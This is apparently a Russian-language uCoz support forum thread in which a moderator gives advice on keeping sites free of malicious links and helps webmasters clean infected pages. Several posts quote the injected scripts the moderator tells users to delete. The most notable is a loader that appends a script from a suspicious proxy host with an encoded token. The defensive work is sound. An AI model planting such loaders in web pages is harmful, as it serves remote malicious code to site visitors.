Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
webanet
Сообщений: 24067
Сообщение # 856 |
23:17:10
18 Дек 2013
ВоровайкА, удалить
Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { var s = "http://cmm.port.pop-proxy.info/?"; s += 73968 + "=hM2EgtaAmZTNxMLFyMjWlp-CnZGEg82Sgtaen5GUhZyEzcE"; script.src = s; w.document.body.appendChild(script); clearInterval(i); } }, 200); };)window); </script> два раза прописан в самом низу шаблонов
далее дайте четкий скрин страницы блокировки гугл хрома. у вас ужасно грязный рип стоит, и вы его ещё приукрасили.
|
ВоровайкА
Сообщений: 10
Сообщение # 857 |
23:38:18
18 Дек 2013
Цитата webanet ( ) далее дайте четкий скрин страницы блокировки гугл хрома. у вас ужасно грязный рип стоит, и вы его ещё приукрасили. К сожалению сейчас это окно не показывается...Но там было указано вот это almastan.fliprunner.in
И на Ваш взгляд лучше убрать всякие украшательства для большей безопасности?
|
webanet
Сообщений: 24067
Сообщение # 858 |
23:47:00
18 Дек 2013
ВоровайкА, удалите то что я сказала
|
ВоровайкА
Сообщений: 10
Сообщение # 859 |
23:49:14
18 Дек 2013
|
webanet
Сообщений: 24067
Сообщение # 860 |
23:50:45
18 Дек 2013
ВоровайкА, все. если опять табличка появится, то ссылку на страницу на которой появляется и скрин
|
ВоровайкА
Сообщений: 10
Сообщение # 861 |
23:53:37
18 Дек 2013
Цитата webanet ( ) ВоровайкА, все. если опять табличка появится, то ссылку на страницу на которой появляется и скрин Спасибо большое Вам И с наступающим
|
kam-mamochka
Сообщений: 5
Сообщение # 862 |
05:53:33
19 Дек 2013
Здравствуйте, all!!
Помогите, плз! Яндекс прислал предупреждение, что сайт заражен!
www.kam-mamochka.ru Вы должны дать описание проблемы:
Результат выборочной проверки Дата последней проверки СтраницаВердикт17.12.2013http://www.kam-mamochka.ru/Поведенческий анализ18.12.2013http://www.kam-mamochka.ru/news/chto_podarit_rebenku_na_novyj_god/2012-11-22-165Поведенческий анализ18.12.2013http://www.kam-mamochka.ru/publ/psikhologija/mezhdu_nami_devochkami/chto_delat_esli_ty_odinoka/13-1-0-33Поведенческий анализ
AVAST мой не реагирует...
браузер Mozilla Firefox сообщает "есть информация, что этот сайт атакует компьютеры"
Очень жду помощи!
Сообщение от kam-mamochka
|
larisa8375
Сообщений: 17
Сообщение # 863 |
08:33:36
19 Дек 2013
Добрый вечер! Пришло сообщение на сайт Ларчик рукоделия http://www.krestiklara.net/ "хелп касперский сайт блокирует говорот что обнаружено вредоносное ПО еле добралась сюда"
Просьба: может кто-нибудь нам помочь?Добавлено (19 Дек 2013, 08:33:36) --------------------------------------------- Пожалуйстааааааа!!!!! Ответьте мне кто-нибуууудь!
|
Землянин3034
Сообщений: 18
Сообщение # 864 |
13:23:27
19 Дек 2013
Цитата webanet ( ) через вебмастер гугла сделайте перепроверку Не могу разобраться как проверить?
Сообщение от Землянин3034
|
admin4001
Сообщений: 209
Сообщение # 865 |
13:57:11
19 Дек 2013
Землянин3034. Не могу разобраться как проверить? для начала, зайдите в гугл вебмастер, кликните на ваш сайт, перейдите на другую страницу, там будет кнопка проблемы безопасности, кликните и всё.Добавлено (19 Дек 2013, 13:57:11) ---------------------------------------------
Цитата larisa8375 ( ) Добрый вечер! Пришло сообщение на сайт Ларчик рукоделия http://www.krestiklara.net/ "хелп касперский сайт блокирует говорот что обнаружено вредоносное ПО еле добралась сюда" Просьба: может кто-нибудь нам помочь? Добавлено (19 Дек 2013, 08:33:36) на вашем сайте в блоке стоит дед мороз, удалите его полностью, у меня были раньше проблемы, с виджетами с этого сайта. --------------------------------------------- Пожалуйстааааааа!!!!! Ответьте мне кто-нибуууудь!
Сообщение отредактировал admin4001 - Четверг, 19 Дек 2013, 13:54:54
|
webanet
Сообщений: 24067
Сообщение # 866 |
17:09:17
19 Дек 2013
kam-mamochka, из формы поиска удалить скрипт
Код <script src="http://radikol.ru/1.js" type="text/javascript"></script>
желательно удалить ужасный код снега с картинками от csomsk
Код <script language="JavaScript1.2"> grphcs=new Array(2) Image0=new Image(); Image0.src=grphcs[0]="http://csomsk.3dn.ru/22-11-10/sneg1.gif"; Image1=new Image(); Image1.src=grphcs[1]="http://csomsk.3dn.ru/22-11-10/sneg1.gif"; Amount=25; Ypos=new Array(); Xpos=new Array(); Speed=new Array(); Step=new Array(); Cstep=new Array(); ns=(document.layers)?1:0
удалить
Код <layer name="lenta" top="0" left="0"> <div style="position:absolute; top:0; left:0;"> <img border="0" src="http://csomsk.ru/1-ucoz/csomsk/rip/newyear1.png" align="left" alt="Зима"> </div> </layer><script src="http://csomsk.ru/notest/elka1.js"></script>
|
webanet
Сообщений: 24067
Сообщение # 867 |
17:28:26
19 Дек 2013
larisa8375, начните с удаления часов из блока время
Код <script language="JavaScript" src="http://101widgets.com/0100023b/160/268"></script></script>
дальше нужен скрин блокировки касперского
|
larisa8375
Сообщений: 17
Сообщение # 868 |
19:38:03
19 Дек 2013
webanet, спасибо огромное!! попробую!
|
kam-mamochka
Сообщений: 5
Сообщение # 869 |
23:42:38
19 Дек 2013
webanet, СПАСИБО! Добавила плюс в репу!
Сообщение от kam-mamochka
|
Землянин3034
Сообщений: 18
Сообщение # 870 |
11:01:58
20 Дек 2013
Всё сделал а всёровно блокировка(((
Сообщение от Землянин3034
|